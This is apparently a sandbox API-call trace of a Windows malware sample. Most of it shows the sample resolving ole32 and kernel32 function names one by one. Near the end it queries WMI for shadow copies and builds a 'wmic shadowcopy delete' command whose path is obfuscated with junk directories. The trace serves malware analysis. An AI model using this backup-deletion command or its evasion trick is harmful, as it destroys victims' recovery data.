lpString1="CoFreeUnusedLibraries") returned="CoFreeUnusedLibraries" [0090.288] lstrlenA (lpString="COFREEUNUSEDLIBRARIES") returned 21 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoFreeUnusedLibrariesEx" | out: lpString1="CoFreeUnusedLibrariesEx") returned="CoFreeUnusedLibrariesEx" [0090.288] lstrlenA (lpString="COFREEUNUSEDLIBRARIESEX") returned 23 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetActivationState" | out: lpString1="CoGetActivationState") returned="CoGetActivationState" [0090.288] lstrlenA (lpString="COGETACTIVATIONSTATE") returned 20 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetApartmentID" | out: lpString1="CoGetApartmentID") returned="CoGetApartmentID" [0090.288] lstrlenA (lpString="COGETAPARTMENTID") returned 16 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetApartmentType" | out: lpString1="CoGetApartmentType") returned="CoGetApartmentType" [0090.288] lstrlenA (lpString="COGETAPARTMENTTYPE") returned 18 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetCallContext" | out: lpString1="CoGetCallContext") returned="CoGetCallContext" [0090.288] lstrlenA (lpString="COGETCALLCONTEXT") returned 16 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetCallState" | out: lpString1="CoGetCallState") returned="CoGetCallState" [0090.288] lstrlenA (lpString="COGETCALLSTATE") returned 14 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetCallerTID" | out: lpString1="CoGetCallerTID") returned="CoGetCallerTID" [0090.288] lstrlenA (lpString="COGETCALLERTID") returned 14 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetCancelObject" | out: lpString1="CoGetCancelObject") returned="CoGetCancelObject" [0090.288] lstrlenA (lpString="COGETCANCELOBJECT") returned 17 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetClassObject" | out: lpString1="CoGetClassObject") returned="CoGetClassObject" [0090.288] lstrlenA (lpString="COGETCLASSOBJECT") returned 16 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetClassVersion" | out: lpString1="CoGetClassVersion") returned="CoGetClassVersion" [0090.288] lstrlenA (lpString="COGETCLASSVERSION") returned 17 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetComCatalog" | out: lpString1="CoGetComCatalog") returned="CoGetComCatalog" [0090.288] lstrlenA (lpString="COGETCOMCATALOG") returned 15 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetContextToken" | out: lpString1="CoGetContextToken") returned="CoGetContextToken" [0090.288] lstrlenA (lpString="COGETCONTEXTTOKEN") returned 17 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetCurrentLogicalThreadId" | out: lpString1="CoGetCurrentLogicalThreadId") returned="CoGetCurrentLogicalThreadId" [0090.288] lstrlenA (lpString="COGETCURRENTLOGICALTHREADID") returned 27 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetCurrentProcess" | out: lpString1="CoGetCurrentProcess") returned="CoGetCurrentProcess" [0090.288] lstrlenA (lpString="COGETCURRENTPROCESS") returned 19 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetDefaultContext" | out: lpString1="CoGetDefaultContext") returned="CoGetDefaultContext" [0090.288] lstrlenA (lpString="COGETDEFAULTCONTEXT") returned 19 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetInstanceFromFile" | out: lpString1="CoGetInstanceFromFile") returned="CoGetInstanceFromFile" [0090.288] lstrlenA (lpString="COGETINSTANCEFROMFILE") returned 21 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetInstanceFromIStorage" | out: lpString1="CoGetInstanceFromIStorage") returned="CoGetInstanceFromIStorage" [0090.288] lstrlenA (lpString="COGETINSTANCEFROMISTORAGE") returned 25 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetInterceptor" | out: lpString1="CoGetInterceptor") returned="CoGetInterceptor" [0090.289] lstrlenA (lpString="COGETINTERCEPTOR") returned 16 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetInterceptorFromTypeInfo" | out: lpString1="CoGetInterceptorFromTypeInfo") returned="CoGetInterceptorFromTypeInfo" [0090.289] lstrlenA (lpString="COGETINTERCEPTORFROMTYPEINFO") returned 28 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetInterfaceAndReleaseStream" | out: lpString1="CoGetInterfaceAndReleaseStream") returned="CoGetInterfaceAndReleaseStream" [0090.289] lstrlenA (lpString="COGETINTERFACEANDRELEASESTREAM") returned 30 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetMalloc" | out: lpString1="CoGetMalloc") returned="CoGetMalloc" [0090.289] lstrlenA (lpString="COGETMALLOC") returned 11 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetMarshalSizeMax" | out: lpString1="CoGetMarshalSizeMax") returned="CoGetMarshalSizeMax" [0090.289] lstrlenA (lpString="COGETMARSHALSIZEMAX") returned 19 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetModuleType" | out: lpString1="CoGetModuleType") returned="CoGetModuleType" [0090.289] lstrlenA (lpString="COGETMODULETYPE") returned 15 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetObject" | out: lpString1="CoGetObject") returned="CoGetObject" [0090.289] lstrlenA (lpString="COGETOBJECT") returned 11 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetObjectContext" | out: lpString1="CoGetObjectContext") returned="CoGetObjectContext" [0090.289] lstrlenA (lpString="COGETOBJECTCONTEXT") returned 18 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetPSClsid" | out: lpString1="CoGetPSClsid") returned="CoGetPSClsid" [0090.289] lstrlenA (lpString="COGETPSCLSID") returned 12 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetProcessIdentifier" | out: lpString1="CoGetProcessIdentifier") returned="CoGetProcessIdentifier" [0090.289] lstrlenA (lpString="COGETPROCESSIDENTIFIER") returned 22 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetStandardMarshal" | out: lpString1="CoGetStandardMarshal") returned="CoGetStandardMarshal" [0090.289] lstrlenA (lpString="COGETSTANDARDMARSHAL") returned 20 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetStdMarshalEx" | out: lpString1="CoGetStdMarshalEx") returned="CoGetStdMarshalEx" [0090.289] lstrlenA (lpString="COGETSTDMARSHALEX") returned 17 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetSystemSecurityPermissions" | out: lpString1="CoGetSystemSecurityPermissions") returned="CoGetSystemSecurityPermissions" [0090.289] lstrlenA (lpString="COGETSYSTEMSECURITYPERMISSIONS") returned 30 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoGetTreatAsClass" | out: lpString1="CoGetTreatAsClass") returned="CoGetTreatAsClass" [0090.289] lstrlenA (lpString="COGETTREATASCLASS") returned 17 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoImpersonateClient" | out: lpString1="CoImpersonateClient") returned="CoImpersonateClient" [0090.289] lstrlenA (lpString="COIMPERSONATECLIENT") returned 19 [0090.289] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoInitialize" | out: lpString1="CoInitialize") returned="CoInitialize" [0090.290] lstrlenA (lpString="COINITIALIZE") returned 12 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoInitializeEx" | out: lpString1="CoInitializeEx") returned="CoInitializeEx" [0090.290] lstrlenA (lpString="COINITIALIZEEX") returned 14 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoInitializeSecurity" | out: lpString1="CoInitializeSecurity") returned="CoInitializeSecurity" [0090.290] lstrlenA (lpString="COINITIALIZESECURITY") returned 20 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoInitializeWOW" | out: lpString1="CoInitializeWOW") returned="CoInitializeWOW" [0090.290] lstrlenA (lpString="COINITIALIZEWOW") returned 15 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoInstall" | out: lpString1="CoInstall") returned="CoInstall" [0090.290] lstrlenA (lpString="COINSTALL") returned 9 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoInvalidateRemoteMachineBindings" | out: lpString1="CoInvalidateRemoteMachineBindings") returned="CoInvalidateRemoteMachineBindings" [0090.290] lstrlenA (lpString="COINVALIDATEREMOTEMACHINEBINDINGS") returned 33 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoIsHandlerConnected" | out: lpString1="CoIsHandlerConnected") returned="CoIsHandlerConnected" [0090.290] lstrlenA (lpString="COISHANDLERCONNECTED") returned 20 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoIsOle1Class" | out: lpString1="CoIsOle1Class") returned="CoIsOle1Class" [0090.290] lstrlenA (lpString="COISOLE1CLASS") returned 13 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoLoadLibrary" | out: lpString1="CoLoadLibrary") returned="CoLoadLibrary" [0090.290] lstrlenA (lpString="COLOADLIBRARY") returned 13 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoLockObjectExternal" | out: lpString1="CoLockObjectExternal") returned="CoLockObjectExternal" [0090.290] lstrlenA (lpString="COLOCKOBJECTEXTERNAL") returned 20 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoMarshalHresult" | out: lpString1="CoMarshalHresult") returned="CoMarshalHresult" [0090.290] lstrlenA (lpString="COMARSHALHRESULT") returned 16 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoMarshalInterThreadInterfaceInStream" | out: lpString1="CoMarshalInterThreadInterfaceInStream") returned="CoMarshalInterThreadInterfaceInStream" [0090.290] lstrlenA (lpString="COMARSHALINTERTHREADINTERFACEINSTREAM") returned 37 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoMarshalInterface" | out: lpString1="CoMarshalInterface") returned="CoMarshalInterface" [0090.290] lstrlenA (lpString="COMARSHALINTERFACE") returned 18 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoPopServiceDomain" | out: lpString1="CoPopServiceDomain") returned="CoPopServiceDomain" [0090.290] lstrlenA (lpString="COPOPSERVICEDOMAIN") returned 18 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoPushServiceDomain" | out: lpString1="CoPushServiceDomain") returned="CoPushServiceDomain" [0090.290] lstrlenA (lpString="COPUSHSERVICEDOMAIN") returned 19 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoQueryAuthenticationServices" | out: lpString1="CoQueryAuthenticationServices") returned="CoQueryAuthenticationServices" [0090.290] lstrlenA (lpString="COQUERYAUTHENTICATIONSERVICES") returned 29 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoQueryClientBlanket" | out: lpString1="CoQueryClientBlanket") returned="CoQueryClientBlanket" [0090.290] lstrlenA (lpString="COQUERYCLIENTBLANKET") returned 20 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoQueryProxyBlanket" | out: lpString1="CoQueryProxyBlanket") returned="CoQueryProxyBlanket" [0090.290] lstrlenA (lpString="COQUERYPROXYBLANKET") returned 19 [0090.290] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoQueryReleaseObject" | out: lpString1="CoQueryReleaseObject") returned="CoQueryReleaseObject" [0090.291] lstrlenA (lpString="COQUERYRELEASEOBJECT") returned 20 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoReactivateObject" | out: lpString1="CoReactivateObject") returned="CoReactivateObject" [0090.291] lstrlenA (lpString="COREACTIVATEOBJECT") returned 18 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterChannelHook" | out: lpString1="CoRegisterChannelHook") returned="CoRegisterChannelHook" [0090.291] lstrlenA (lpString="COREGISTERCHANNELHOOK") returned 21 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterClassObject" | out: lpString1="CoRegisterClassObject") returned="CoRegisterClassObject" [0090.291] lstrlenA (lpString="COREGISTERCLASSOBJECT") returned 21 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterInitializeSpy" | out: lpString1="CoRegisterInitializeSpy") returned="CoRegisterInitializeSpy" [0090.291] lstrlenA (lpString="COREGISTERINITIALIZESPY") returned 23 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterMallocSpy" | out: lpString1="CoRegisterMallocSpy") returned="CoRegisterMallocSpy" [0090.291] lstrlenA (lpString="COREGISTERMALLOCSPY") returned 19 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterMessageFilter" | out: lpString1="CoRegisterMessageFilter") returned="CoRegisterMessageFilter" [0090.291] lstrlenA (lpString="COREGISTERMESSAGEFILTER") returned 23 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterPSClsid" | out: lpString1="CoRegisterPSClsid") returned="CoRegisterPSClsid" [0090.291] lstrlenA (lpString="COREGISTERPSCLSID") returned 17 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterSurrogate" | out: lpString1="CoRegisterSurrogate") returned="CoRegisterSurrogate" [0090.291] lstrlenA (lpString="COREGISTERSURROGATE") returned 19 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRegisterSurrogateEx" | out: lpString1="CoRegisterSurrogateEx") returned="CoRegisterSurrogateEx" [0090.291] lstrlenA (lpString="COREGISTERSURROGATEEX") returned 21 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoReleaseMarshalData" | out: lpString1="CoReleaseMarshalData") returned="CoReleaseMarshalData" [0090.291] lstrlenA (lpString="CORELEASEMARSHALDATA") returned 20 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoReleaseServerProcess" | out: lpString1="CoReleaseServerProcess") returned="CoReleaseServerProcess" [0090.291] lstrlenA (lpString="CORELEASESERVERPROCESS") returned 22 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoResumeClassObjects" | out: lpString1="CoResumeClassObjects") returned="CoResumeClassObjects" [0090.291] lstrlenA (lpString="CORESUMECLASSOBJECTS") returned 20 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRetireServer" | out: lpString1="CoRetireServer") returned="CoRetireServer" [0090.291] lstrlenA (lpString="CORETIRESERVER") returned 14 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRevertToSelf" | out: lpString1="CoRevertToSelf") returned="CoRevertToSelf" [0090.291] lstrlenA (lpString="COREVERTTOSELF") returned 14 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRevokeClassObject" | out: lpString1="CoRevokeClassObject") returned="CoRevokeClassObject" [0090.291] lstrlenA (lpString="COREVOKECLASSOBJECT") returned 19 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRevokeInitializeSpy" | out: lpString1="CoRevokeInitializeSpy") returned="CoRevokeInitializeSpy" [0090.291] lstrlenA (lpString="COREVOKEINITIALIZESPY") returned 21 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoRevokeMallocSpy" | out: lpString1="CoRevokeMallocSpy") returned="CoRevokeMallocSpy" [0090.291] lstrlenA (lpString="COREVOKEMALLOCSPY") returned 17 [0090.291] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoSetCancelObject" | out: lpString1="CoSetCancelObject") returned="CoSetCancelObject" [0090.292] lstrlenA (lpString="COSETCANCELOBJECT") returned 17 [0090.292] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoSetProxyBlanket" | out: lpString1="CoSetProxyBlanket") returned="CoSetProxyBlanket" [0090.292] lstrlenA (lpString="COSETPROXYBLANKET") returned 17 [0090.292] CoSetProxyBlanket (pProxy=0x31d0e4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0090.292] IWbemServices:ExecQuery (in: This=0x31d0e4, strQueryLanguage="WQL", strQuery="select * from Win32_Shado", lFlags=48, pCtx=0x0, ppEnum=0xc9f1a0 | out: ppEnum=0xc9f1a0*=0x31d24c) returned 0x0 [0090.294] IEnumWbemClassObject:Next (in: This=0x31d24c, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x75975969, puReturned=0xc9f18c*=0x0) returned 0x1 [0090.321] WbemLocator:IUnknown:Release (This=0x31d0e4) returned 0x0 [0090.322] WbemLocator:IUnknown:Release (This=0x310880) returned 0x0 [0090.322] WbemContext:IUnknown:Release (This=0x31cff8) returned 0x0 [0090.322] CoUninitialize () [0090.322] GetSystemDirectoryW (in: lpBuffer=0xc9f26c, uSize=0x100 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0090.322] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\wbem\\wmic.exe" | out: lpString1="C:\\Windows\\system32\\wbem\\wmic.exe") returned="C:\\Windows\\system32\\wbem\\wmic.exe" [0090.322] lstrlenA (lpString="kernel32.dll") returned 12 [0090.322] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0090.322] lstrcpyA (in: lpString1=0xc9e520, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0090.322] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0090.322] lstrcpyA (in: lpString1=0xc9e520, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0090.322] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0090.322] lstrcpyA (in: lpString1=0xc9e520, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0090.322] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0090.322] lstrcpyA (in: lpString1=0xc9e520, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0090.322] lstrlenA (lpString="ADDATOMA") returned 8 [0090.322] lstrcpyA (in: lpString1=0xc9e520, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0090.322] lstrlenA (lpString="ADDATOMW") returned 8 [0090.322] lstrcpyA (in: lpString1=0xc9e520, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0090.322] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0090.322] lstrcpyA (in: lpString1=0xc9e520, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0090.322] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0090.322] lstrcpyA (in: lpString1=0xc9e520, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0090.322] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0090.322] lstrcpyA (in: lpString1=0xc9e520, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0090.322] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0090.322] lstrcpyA (in: lpString1=0xc9e520, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0090.322] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0090.322] lstrcpyA (in: lpString1=0xc9e520, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0090.323] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0090.323] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0090.323] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0090.323] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0090.323] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0090.323] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0090.323] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0090.323] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0090.323] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0090.323] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0090.323] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0090.323] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0090.323] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0090.323] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0090.323] lstrlenA (lpString="BACKUPREAD") returned 10 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0090.323] lstrlenA (lpString="BACKUPSEEK") returned 10 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0090.323] lstrlenA (lpString="BACKUPWRITE") returned 11 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0090.323] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0090.323] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0090.323] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0090.324] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0090.324] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0090.324] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0090.324] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0090.324] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0090.324] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0090.324] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0090.324] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0090.324] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0090.324] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0090.324] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0090.324] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0090.324] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0090.324] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0090.324] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0090.324] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0090.324] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0090.324] lstrcpyA (in: lpString1=0xc9e520, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0090.326] wsprintfW (in: param_1=0x12b0000, param_2="\"%s\" shadowcopy delete" | out: param_1="\"C:\\bkbe\\yq\\gay\\..\\..\\..\\Windows\\cyh\\huxn\\t\\..\\..\\..\\system32\\a\\e\\b\\..\\..\\..\\wbem\\rop\\mxutf\\..\\..\\wmic.exe\" 